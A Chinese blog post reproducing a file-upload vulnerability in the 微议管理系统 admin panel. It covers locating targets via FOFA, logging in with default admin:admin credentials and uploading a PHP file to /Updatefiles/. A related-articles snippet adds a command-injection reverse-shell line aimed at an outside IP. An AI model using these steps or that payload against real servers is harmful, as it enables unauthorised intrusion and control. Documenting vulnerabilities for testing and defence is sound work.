微议管理系统后台文件上传漏洞

最新推荐文章于 2024-04-27 13:43:51 发布
最新推荐文章于 2024-04-27 13:43:51 发布
阅读量922 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_17754023/article/details/127457607
版权

漏洞描述

微议管理系统存在后台文件上传漏

而且在fofa上搜索存在大量弱口令漏洞

攻击者可以通过上传木马执行任意命令,获取服务器管理权限。

fofa"微议管理系统"

 

1.使用默认口令admin:admin登录

 2.

服务器管理

 

 更新文件管理

 

 不过貌似看来被大佬复现过了

上传phpinfo文件

<?php phpinfo();?>

访问该文件

/Updatefiles/xx.php

技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一个梦字
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fofa搜索漏洞技巧
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-08 3441
fofa搜索漏洞技巧整理,主要有以下十个方面:搜索HTTP响应头中含有"thinkphp"关键词的网站和IP;加上标题带有后台的;加上时间,现在新网站有thinkphp日志泄露的有很多; 搜索html正文中含有"管理后台"关键词的网站和IP body="管理后台"等。 fofa搜索漏洞技巧整理1、搜索HTTP响应头中含有"thinkphp"关键词的网站和IP。 header="thinkphp" && country="CN"
通过fofa与nmap联动寻找FTP协议漏洞方案
m0_52027565的博客
11-17 768
通过fofa与nmap联动寻找FTP协议漏洞方案 你好哇!我是面包and牛奶——一个堪堪入门的"安全菜鸟",最近通过研究Google语法和伪协议;对FTP协议漏洞具有了一定程度的了解。所以写下这篇博客作为学习记录,并且分享给阅读这篇文章的有缘人! 学习过程谷歌语法 || FTP协议一、使用fofa查找开放21端口的目标二、使用namp爆破1.设置脚本2.攻击总结 谷歌语法 || FTP协议 Google语法产生原因:Google是一个功能强大的搜索引擎,通过预定义命令,可以查询出令...
如何寻找网站文件上传漏洞
dzqxwzoe的博客
03-02 946
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。JS验证时通过Java script来判断文件,过滤,这个好解决,就是直接删除过滤的代码,因为这是客户端代码,这些代码是直接显示出来的,所以我可以知道他们的代码。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
实战 记一次X站逻辑漏洞到到管理员后台
最新发布
2401_84264244的博客
04-27 866
有些开发会偷懒,把后台添加用户(包含管理员)用一个接口,但后台功能肯定是全面的,但还是同一个接口,为了偷懒把前台用户也用这个接口,只是明面上把东西进行阉割处理,但只要进行正确的传参还是可以的,当然这个有运气成分,侥幸而已。
常见漏洞挖掘——弱口令(任意文件上传
weixin_53884648的博客
04-24 1184
常见漏洞挖掘;弱口令进入到任意文件上传
210104-技术分享-漏洞复现-shiro
leesinalps的博客
01-04 1998
2021年1月4日 技术分享-漏洞复现-shiro by:leesin(ps:内部使用,未经授权不得外发) 1. shiro反序列号漏洞 1.1 漏洞形成原因 Apache Shiro(安全框架不安全,噗哈哈哈)框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie。cookie的key为RememberMe,cookie的值是经过对相关信息进行序列化,然后使用aes加密,最后在使用base64编码处理形成的。 在服务端接收cookie值时,按照如下步骤来解析处理
文件上传漏洞的思维导图
04-19
11. **利用思路**:攻击者可能通过扫描、会员中心、后台系统、CMS漏洞、代码审计、第三方应用等多种途径寻找和利用文件上传漏洞。 总之,防止文件上传漏洞需要全面的安全策略,包括前端与后端的双重验证、合理的...
CwCMS_php-带有后台文件上传漏洞源码包.rar
03-17
【标题】"CwCMS_php-带有后台文件上传漏洞源码包.rar"涉及的主要知识点是关于网站内容管理系统(CMS)的安全性和PHP编程中的文件上传漏洞。CwCMS是一款基于PHP语言构建的内容管理平台,该源码包包含了可能存在的安全...
美易企业内容管理系统上传漏洞补丁.rar
07-17
1. 首先,下载"美易企业内容管理系统上传漏洞补丁.rar"压缩包,确保你拥有管理员权限,因为补丁需要修改系统核心文件。 2. 解压缩文件,你会看到"上传漏洞补丁.txt"和"下载说明.txt",这两个文件提供了详细的补丁...
Timo后台管理系统(mysql版).zip
01-12
用户管理:用于管理后台系统的用户,可进行增删改查等操作。 角色管理:分配权限的最小单元,通过角色给用户分配权限。 菜单管理:用于配置系统菜单,同时也作为权限资源。 部门管理:通过不同的部门来管理和区分...
帝国 cms 后台管理系统
07-27
**帝国CMS后台管理系统详解** 帝国CMS是一款广泛应用的网站后台管理系统,尤其受到网络开发者的青睐。其强大功能和丰富的模板资源,使得它在构建各种类型的网站时都能够得心应手。以下将详细介绍帝国CMS的主要特点...
实战案例-Fofa拿下pikachu服务器保姆级别教程(文件上传下载&webshell)
jnszstmei的博客
04-14 1184
输入127.0.0.1 & 1.exe -e cmd 47.109.189.205 5566(47.109.189.205为自己服务器的ip),拿到服务器的控制权
Laykefu客服系统任意文件上传漏洞
qq_36334672的博客
01-25 357
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求中Cookie中的”user_name“不为空时即可绕过登录系统后台,未经身份验证的攻击者可利用此问题,上传后门文件,获取服务器权限。
金蝶 Apusic 任意文件上传漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-08 1011
金蝶 Apusic 是金蝶集团旗下的一款企业级应用服务器,专为企业提供可靠、高性能的应用运行环境。Apusic 支持 Java、.NET、Node.js 等多种开发语言和技术,可以用于构建各种企业级应用,如企业资源计划 (ERP) 系统、客户关系管理 (CRM) 系统、供应链管理系统等。
简单破解弱口令账户密码
xdjxi的博客
12-08 1329
1 点开弱口令检查工具;在目标填写目标IP地址 2 输入账户名 导入密码 点击ssh远程控制;然后扫描端口就可以了
FOFA(一): FOFA入门
热门推荐
浅弋、璃鱼的博客
01-03 1万+
FOFA是部署在互联网上的网络设备资产信息搜索引擎。旨在尽可能多的对全球IT设备资产进行信息收集, 进而开展资产影响分析、漏洞影响分析, 为相关流行态势感知分析提供依据;
weblogic弱口令漏洞复现
懂进攻知防守
07-20 1419
本文记录weblogic弱口令拿下某网站实例,仅供教学参考,后果自负!
FOFA实战攻防对抗中企业安全运营场景下的应用(一)
weixin_54960362的博客
01-17 1190
FOFA实战攻防对抗中企业安全运营场景下的应用(一)
任意文件上传漏洞
gaomei2009的专栏
08-24 2311
任意文件上传漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值